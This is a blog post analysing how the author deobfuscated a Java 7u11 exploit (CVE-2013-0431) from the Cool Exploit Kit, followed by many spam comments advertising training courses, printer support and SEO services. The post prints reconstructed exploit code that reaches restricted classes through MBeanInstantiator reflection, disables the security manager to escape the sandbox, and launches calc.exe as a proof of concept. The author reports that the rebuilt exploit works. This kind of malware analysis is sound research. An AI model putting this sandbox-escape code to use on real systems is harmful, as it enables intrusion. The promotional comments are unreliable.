Tuesday, February 26, 2013

Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)

At the beginning of the past week @EKWatcher has spotted Cool Exploit Kit using Java 7 update 11 vulnerability (CVE-2013-0431).


This vulnerability was already reported by Security Explorations on seclist few days after Oracle issued update 11.

I decided take a look at it. I found a website infected by Cool EK that after a successfull exploitation dropped Reveton into "C:\Documents and Settings\<usarname>\Application Data" folder on Windows XP.

The applet used by Cool EK was named would-blood.jar and once opened with JD-GUI the result was this.


As you can see it's obfuscated, not heavily but obfuscated. The first thing to do when you want to start deobfuscating an applet is to find the init() function which is the "starting point" and cannot be changed. Remember that for serialized applets the starting point is a function called start() instead of init().

The init function is inside hw class.


It's immediately evident that all strings in init() are reversed, for example the first one is txetnoC.lanretni.tpircsavaj.allizom.gro.nus which written backwards will become sun.org.mozilla.javascript.internal.Context. As supposed pah function reverse the string.

The next function called is bug.


Bug function obtains the MBeanInstantiator associated to MBeanServer and calls rue2.


Now through the use of reflection invokes the method findClass which finds and return the specified class (sun.org.mozilla.javascript.internal.Context).

Considering this, we can remove pah function and join bug with rue2 in a new one function called GimmeClass.
private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
       
    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }
Back to init function, at line 76 lot function is executed and since it returns a Method object i suppose that is used to find a method.


As expected its job is to search for a public method in a class, which is equal to the string s passed as parameter. Instead of lot let's call it getMethod that sounds more clear.
private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;
     
      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
      }
    } catch (Exception localException) {  }
 
    return null;
  }
At line 77 the previous searched method is invoked. Line 78 and 79 do the same thing of previous lines. At line 82 a byte array (abyte0) is instantiated.


This instruction calls two methods, one from getString4Popers class and one from codehex. Let's examine the first one, which is one. After declaring sixteen strings (127 in total) and concatenating each other, it calls another method with the name gouerpyftn from BurkinoGoso class.


All this concatenated strings goes as parameter to gouerpyftn. As you can see from the picture below the value of string str will be the value of the string str1 inside gouerpyftn function. 

Str3 and str4 are garbage because they will never be used. Instruction 13 use reflection to call the method charAt from package java.lang.String.

What the function does is: (I will try to explain through pseudocode)
// encodedString is paramString
encodedStrign = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(- ..."
// keyString is str1 (getString.getKkkk())
keyString = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"

for( i = 0; i < encodedString.length; i++ )
    c = encodedString.charAt(i);
 j = keyString.indexOf( c )
 
 if c is inside keyString
 
  if c is not in the first position 
   give me char from keyString at position j-1
   concatenate to finalString
     else
   give me char from keyString at position keyString.length-1
   concatenate to finalString
 else
  give me char from encodedString at position i
        concatenate to finalString
   
endfor;

return finalString
At the end of this loop str2/finalString will be like this.


Looking at the first eight chars you can clearly understand what kind of string is this, because CAFEBABE is the hexadecimal representation of the header for Java bytecode class files.

But we have a byte array (abyte0), in fact as name could suggest the method decodeH from class codehex converts hexadecimal string into a byte array.

From line 8 to line 19 is again garbage added by the obfuscator so we can remove it. In order to know what code that class contains we have to write it on a file called newfile.class and then try to open with JD-GUI.
But JD-GUI failed to decompile the class file. I wasn't expecting this result, anyway let's open it with Winhex.

This confirm that is a class file. Switching to option text display only you can clearly see what this class is supposed to do.


Scrolling down there is an interesting string.


This means that this class file has been obfuscated with Zelik Klassmater 5.4.5 which was available from March 2011 to June 2011. I don't know if zelik during the obfuscation process fakes his version so i cannot be 100% sure about this. 

Another interesting string is

Now how we proceed ?. Let's try jad which is another java decompiler.


Most of the file has been disassembled successfully but as you can see into the constructor it uses reflection to call a method from a class. Both names are encrypted by a xor function called from a static field during class initialization.


Not good, some methods aren't properly decompiled. Seems that Zelix has been used with aggressive flow obfuscation, maybe this is why jad can't fully decompile it.

Searching on google on how to deobfuscate Zelix Klassmaster files i've found this great post by @robert_c_larsen which explains how to decrypt these strings. The first thing we need to do is to disassembly our obfuscated file with jad in order to obtain only jvm instructions.


Now, all we have to do is interpret these instructions. I will cover most important parts, if you want a full overview i suggest you to read Robert's post. The picture below means that a string is pushed onto the stack and then it goes to the decrypting subroutine.


The decrypting subroutine starts at instruction 132 by splitting the given string into a char array.


Next, an array of five elements is stored and from instruction 184 to 204 five integers (which are the keys) are pushed onto the stack and then a xor operation is performed.


Knowing this we can rebuild the code.

For some strange reason syntax highlighter doesn't allow me to paste here this code, i will investigate.

Link to pastebin

Run it and voilà, all strings are decrypted.

I've renamed javaRun to Payload
public class Payload implements PrivilegedExceptionAction
{
   
    public Payload()
    {
        try
        {  
            Class.forName("java.security.AccessController").getMethod("doPrivileged", new Class[] { Class.forName("java.security.PrivilegedExceptionAction")
            }).invoke(Class.forName("java.security.AccessController"), new Object[] {
                this
            });
             
        }
        catch(Exception exception) { }
    }
 
    public Object run() throws Exception
    {
        System.setSecurityManager(null);
        return null;
    }
 
    public static void outSandbox() throws Exception
    {
        Runtime.getRuntime().exec("calc.exe");
    }
}
Instead of running the calculator into the run function i chose to create another function called outSandox to make it more clear.

Back to init() instruction at line 84,85,86 call the same methods that we have already viewed. Instruction 89 return a string, apparently is the path of the jar. Instruction 90 and 91 call the construction from Payload class and instantiate it. 

I've modified a bit the code from the original version.

  Java 7u11 Exploit Source Code

Now we have finished so let's test it out.

It works!. This PoC can be improved, but i leave it as it is. Instead of deobfuscating this applet Kafeine told me that there were some without obfuscation. The only thing i can say is bad luck for me.

Hope you enjoyed.

If you want to read an analysis of this vulnerability here it is a post by Juan Vazquez from Rapid7.

Reference:

87 comments:

  1. Replies
    1. Thanks for the post, I am techno savvy. I believe you hit the nail right on the head. I am highly impressed with your blog. It is very nicely explained. Your article adds best knowledge to our Java Online Training from India. or learn thru Java EE Online Training Students.

      Delete
  2. Nice analyze! Thank you.

    ReplyDelete
  3. Nice Work!

    Especially thanks for the Zelix hint. Brought to an end on my own alysis
    here

    @malforsec

    ReplyDelete
  4. Hmm, good job! This is really something!

    ReplyDelete
  5. Wow! What a great idea in the post! What a concept! And beautiful theme that’s Amazing … find more info

    ReplyDelete
  6. BlueHost is definitely one of the best hosting provider with plans for any hosting needs.

    ReplyDelete
  7. I always enjoy reading quality articles by an individual who is obviously knowledgeable on their chosen subject. Ill be watching this post with much interest. Keep up the great work, I will be back
    python Training institute in Pune
    python Training institute in Chennai
    python Training institute in Bangalore

    ReplyDelete
  8. I read this post two times, I like it so much, please try to keep posting & Let me introduce other material that may be good for our community.
    Best Devops online Training
    Online DevOps Certification Course - Gangboard

    ReplyDelete
  9. Thank you for an additional great post. Exactly where else could anybody get that kind of facts in this kind of a ideal way of writing? I have a presentation next week, and I’m around the appear for this kind of data.

    Data Science Training in Indira nagar
    Data Science training in marathahalli
    Data Science Interview questions and answers
    Data Science training in btm layout
    Data Science Training in BTM Layout
    Data science training in bangalore

    ReplyDelete
  10. I am Here to Get Learn Good Stuff About sap hana,Thanks For Sharing sap hana.SAP PP Training in Bangalore

    ReplyDelete
  11. Its help me to improve my knowledge and skills also.im really satisfied in this sap hr session.SAP ewm Training in Bangalore

    ReplyDelete
  12. Wow it is really wonderful and awesome thus it is veWow, it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot.SAP crm Training in Bangalore

    ReplyDelete
  13. This is the exact information I am been searching for, Thanks for sharing the required infos with the clear update and required points. To appreciate this I like to share some useful information.SAP pm Training in Bangalore

    ReplyDelete
  14. It is very good and useful for students and developer.Learned a lot of new things from your post Good creation,thanks for give a good information at sap crm.SAP scm Training in Bangalore

    ReplyDelete
  15. I have to voice my passion for your kindness giving support to those people that should have guidance on this important matter.sap Training in Bangalore

    ReplyDelete
  16. I really enjoy reading this article.Hope that you would do great in upcoming time.A perfect post.Thanks for sharing.sap mm Training in Bangalore

    ReplyDelete
  17. I must appreciate you for providing such a valuable content for us. This is one amazing piece of article.Helped a lot in increasing my knowledge.sap basis Training in Bangalore

    ReplyDelete
  18. Thanks For sharing a nice post about sap abap Training Course.It is very helpful and sap abap useful for us.sap hr Training in Bangalore

    ReplyDelete
  19. Excellent information with unique content and it is very useful to know about the sap ewm.sap sd Training in Bangalore

    ReplyDelete
  20. It has been great for me to read such great information about sap wm.sap bw Training in Bangalore

    ReplyDelete
  21. Excellent information with unique content and it is very useful to know about the information.sap s4 Training in Bangalore

    ReplyDelete
  22. I think there is a need to look for some more information and resources about Informatica to study more about its crucial aspects.sap ehs Training in Bangalore

    ReplyDelete
  23. It is really explainable very well and i got more information from your site.Very much useful for me to understand many concepts and helped me a lot.sap bpc Training in Bangalore

    ReplyDelete
  24. Congratulations! This is the great things. Thanks to giving the time to share such a nice information.sap bods Training in Bangalore

    ReplyDelete
  25. The Information which you provided is very much useful for Agile Training Learners. Thank You for Sharing Valuable Information.sap abap Training in Bangalore

    ReplyDelete
  26. Excellent post for the people who really need information for this technology.sap fico Training in Bangalore

    ReplyDelete
  27. Very useful and information content has been shared out here, Thanks for sharing it.sap hana Training in Bangalore

    ReplyDelete
  28. Awesome post with lots of data and I have bookmarked this page for my reference. Share more ideas frequently.sap fiori Training in Bangalore

    ReplyDelete
  29. Excellent post with valuable content. It is very helpful for me and a good post.sap testing Training in Bangalore

    ReplyDelete
  30. Thank you for the most informative article from you to benefit people like me.sap gts Training in Bangalore

    ReplyDelete
  31. The content was very interesting, I like this post. Your explanation way is very attractive and very clear.sap apo Training in Bangalore

    ReplyDelete
  32. We have the best and the most convenient answer to enhance your productivity by solving every issue you face with the software.sap security Training in Bangalore

    ReplyDelete
  33. Took me time to read all the comments, but I really enjoyed the article.sap wm Training in Bangalore

    ReplyDelete
  34. Excellent post, it will be definitely helpful for many people. Keep posting more like this.sap srm Training in Bangalore

    ReplyDelete
  35. Your post is so clear and informative. I feel good to be here reading your superb work.sap ps Training in Bangalore

    ReplyDelete
  36. I have recently visited your blog profile. I am totally impressed by your blogging skills and knowledge.sap ehs Training in Bangalore

    ReplyDelete
  37. Thanks for sharing it with us. I am very glad that I spent my valuable time in reading this post.Salesforce CRM Training in Bangalore

    ReplyDelete
  38. I know that it takes a lot of effort and hard work to write such an informative content like this.Salesforce Admin Training in Bangalore

    ReplyDelete
  39. Opt For Epson Support To Handle Spooler Errors With Care

    Nowadays Epson is being used all across the world for the purpose of availing the high performing and innovative printer. However, these printers sometimes show spooler problems and due to lack of proficiency users are not capable of fixing such kind of errors. For that, it would be wise to use Epson Support anytime.

    ReplyDelete
  40. Is HP Support Assistant Capable Of Resolving Slow Printing Problems?

    Are you also seeking out a reliable and realistic source to resolve various printer problems such as slow printing problems and many more? In such a case, consider approaching HP Support Assistant would be a right choice for fetching the proper technical backing under the supervision of world class professionals.

    ReplyDelete
  41. Why To Make Use Of HP Support Assistant In Your Hard Time?

    It would be a good practice if you make proper utilization of HP Support Assistant whenever any kind of HP printer related problems take place. However, if you face various unexpected problems and hurdles, you should make use of the above source and opt for the right kind of solution right now.


    ReplyDelete
  42. Priceless Troubleshooting HP Printer Support For Proper Guidance & Supervision

    In order to get the easiest procedures to resolve different printer errors, issues and problems, you should get in touch with HP Printer Support troubleshooting professionals as quickly as possible. Once you established connection, you can get the instant customer care service under the supervision of certified experts.

    ReplyDelete
  43. Epson Support: A Facility Active 24by7 For Printer Detection Problems
    Whenever you want to tackle down printer detection problems with your Epson printer or you want to optimize the performance of the Epson printer, you should make use of Epson Support via different channels such as live chat or email support service. Here, delivering of the best and effective solution is ensured. https://www.epsonprintersupportpro.net/



    ReplyDelete
  44. How Can I Approach HP Support Assistant For Fixing Optimization Problems?

    If you are one of those HP printer users and are suffering from the problems which occur when it comes to optimizing HP printers, you should immediately get in touch with HP Support Assistant and ask for the better technical guidance which would be helpful in optimizing the performance of the HP printers in no time. https://www.hpprintersupportpro.net/hp-support-assistant/


    ReplyDelete

  45. For Emergency Support To Gmail Problems Use Gmail Help Service
    A team of customer care professionals and techies works day and night with full dedication and is committed to delivering the better technical aid so that one can grab the Gmail Help services in a proper manner. So, all set to fetch help regarding your problems just approach the experts as quickly as possible.

    ReplyDelete

  46. Setup, manage & optimize yahoo account with Yahoo Customer Service
    Are you tired of remembering, controlling and managing different passwords of your respective yahoo account? Do you want to enable the account key in yahoo? Enabling the account key, you get an official mail from yahoo in your mobile device as a confirmation. Approving access through your phone by tapping, you are allowed to access your account. Other queries like setting account key, signing in or disabling account key or managing devices will be solved on a quick reference with the aid of Yahoo Customer Service.

    ReplyDelete

  47. Extirpate Poor Security Issues With The Aid Of Gmail Email Login.
    To overcome the poor security issues related to Gmail mail account, users should quickly connect with the right troubleshooting aid provider by making use of Gmail Email Login. Here, you can make use of help directly from the diligent experts who will help you to resolve your issues on urgent basis.

    ReplyDelete
  48. Recover Your Lost frontier Account Password Via Frontier email login
    Are you getting a lot of confusion when it comes to recovering your frontier mail account password? Are you unable to get the right kind of technical kind of help so that you could get the resolve all your problems? In such a case, you should opt for the help by making use of Frontier email login .

    ReplyDelete
  49. Instant delivery of all solutions at Yahoo Customer Service
    It’s not a matter of hassle when it comes to connecting our Yahoo Customer Service staff for technical assistance. At the time while using yahoo mail or other services when you face some errors, then taking guidance from experts will be a better solution for it. Mail login, reset password, hacked account, and several other technical glitches are friendly solved here. To meet experts for quick results.

    ReplyDelete
  50. Stamp Out Contact Importing Problems Through Gmail Number?
    If you want to get rid of various contact import related problems getting unexpectedly on Gmail, just connect with world class troubleshooting professionals who are live all the time with a simple focus of providing the right troubleshooting guidance by making use of Gmail Number at anytime.

    ReplyDelete
  51. Know a significant way to secure your account via Yahoo Customer Service
    If you are concerned about your account privacy and want to stop it being accessed by some unauthorized persons, then you need to follow a few steps process. First of all, you need to use safe methods to sign in to your account after that keeps your contact information up to date. Also, if you will make good online habits, then it will be more comfortable for you to keep away from scams. For details, join our Yahoo Customer Service now.

    ReplyDelete
  52. Immediately Dial Our Yahoo Phone Number If Facing Issues In Yahoo Login
    Facing issue with yahoo login? Immediately look for help and make changes as given online. The best option would be to dial our Yahoo Phone Number now and get your login query resolved. They are very dedicated towards every task that they received or are assigned to them. They are highly technical os they deliver work within a couple of minutes. They are reliable and deliver service all round the clock.

    ReplyDelete
  53. Stuck While Accessing Yahoo Account Fix By Calling On Our Yahoo Phone Number
    Unable to access yahoo account? First, check your internet connection that could be a reason for its not working. Still yahoo not working, then look for helps online. Online there are various solutions given but we would recommend you to take our yahoo customer service so that your account is also secure. They are capable enough in giving solutions immediately. Dial our Yahoo Phone Number now and resolve your issues.

    ReplyDelete
  54. Its really helpful for the users of this site. I am also searching about these type of sites now a days. So your site really helps me for searching the new and great stuff.

    aws training in bangalore

    aws courses in bangalore

    aws classes in bangalore

    aws training institute in bangalore

    aws course syllabus

    best aws training

    aws training centers

    ReplyDelete
  55. This is the exact information I am been searching for, Thanks for sharing the required infos with the clear update and required points. To appreciate this I like to share some useful information.

    mulesoft training in bangalore

    mulesoft courses in bangalore

    mulesoft classes in bangalore

    mulesoft training institute in bangalore

    mulesoft course syllabus

    best mulesoft training

    mulesoft training centers

    ReplyDelete
  56. If you wish to download the HP Solution Center for your printer then there is no link for that because it is part of your printer’s full feature software solution. You can install HP Solution Center with the Windows full feature software from HP’s website.

    ReplyDelete
  57. The best and most common troubleshooting technique to pinpoint problematic software or hardware is to start your computer in safe mode. As it runs the device with only the basic files and services required. To know more about How to start hp laptop in safe mode in windows 10 feel free to visit our blog.

    ReplyDelete
  58. As reported by Stanford Medical, It's indeed the ONLY reason women in this country get to live 10 years more and weigh an average of 42 pounds lighter than we do.

    (And actually, it has absoloutely NOTHING to do with genetics or some secret diet and EVERYTHING to related to "how" they are eating.)

    BTW, I said "HOW", not "what"...

    Tap on this link to find out if this quick quiz can help you decipher your real weight loss possibility

    ReplyDelete
  59. very interesting info and very helpful. keep posting more blogs that are very useful. I have information regarding data science course in Chennai.
    data-science training
    Data-Analytics course
    business analytics -Python course

    ReplyDelete
  60. Nice blog,I understood the topic very clearly,And want to study more like this.
    Data Scientist Course

    ReplyDelete
  61. Nice blog with Amazing information .. love to read about this.
    Awaiting for your new post
    We at Fullassignment.com bring to you the most significant Management assignment help writing service at the best cost. With long stretches of understanding we are prepared to give assignment help online over the globe.You will be guided here with a portion of the information of Management assignment which could assist you in deciding writing a Manageent assignment. Nonetheless, we unequivocally prescribe you to benefit Consumer Behaviour Assignment Help from our specialist to find out about marketing and its scope.We also provide Business Economics Assignment Help from our experts.

    https://fullassignment.com/

    ReplyDelete
  62. The blog is very useful and informative CCNA

    ReplyDelete
  63. Nice article. I liked very much. All the informations given by you are really helpful for my research. keep on posting your views.
    ccna course in Chennai
    ccna Training in Chennai
    ccna Training institute in Chennai
    ccna institute in Chennai
    Best CCNA Training Institute in Chennai

    ReplyDelete
  64. You have clarified the idea truly well. Was searching for this data from some time and fortunately I discovered your post. Searching forward for a greater amount of such useful updates from you
    Data Science Training In Hyderabad
    Data Science Course In Hyderabad

    ReplyDelete
  65. You have clarified the idea truly well. Was searching for this data from some time and fortunately I discovered your post. Searching forward for a greater amount of such useful updates from you
    Data Science Training In Hyderabad
    Data Science Course In Hyderabad

    ReplyDelete
  66. Anyone can attempt writing on your behalf, however, the question is would you pay someone to do it for you without checking their credibility? Our firm has established itself as the most trustworthy assignment helper online firm in Australia and globally. Join these thousands of students and achieve high distinction in each and every one of your college tasks. This is the main reason why most students search for onlineassignmenthelpaustralia over the internet and choose only the most proficient and trusted academic writing experts. So, if you are searching for quality assignment help in canada you can find it right here from the local experts.

    ReplyDelete
  67. Nice informations. Thank you so much for sharing this information.
    python course in coimbatore

    data science course in coimbatore

    android training institutes in coimbatore

    amazon web services training in coimbatore

    big data training in coimbatore

    RPA Course in coimbatore

    artificial intelligence training in coimbatore

    ReplyDelete
  68. I really appreciate the kind of topics you post here. Thanks for sharing us a great information that is actually helpful. Good day!
    Best Data Science training in Mumbai

    Data Science training in Mumbai

    ReplyDelete
  69. Awesome blog. I enjoyed reading your articles. This is truly a great read for me. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work!

    data science course

    ReplyDelete
  70. Informative post, i love reading such posts. Read my posts here
    Fdesports
    Laravel web development services
    Intensityesports

    ReplyDelete
  71. Finding the best healthcare research paper services and Healthcare Essay Writing Services is not easy unless one is keen to establish a professional healthcare assignment writing service provider & healthcare homework help online.

    ReplyDelete
  72. Your article is extremely well-written. This is great informational content from my point of view. You also make many valid points with compelling, unique content.

    SEO services in kolkata
    Best SEO services in kolkata
    SEO company in kolkata
    Best SEO company in kolkata
    Top SEO company in kolkata
    Top SEO services in kolkata
    SEO services in India
    SEO copmany in India

    ReplyDelete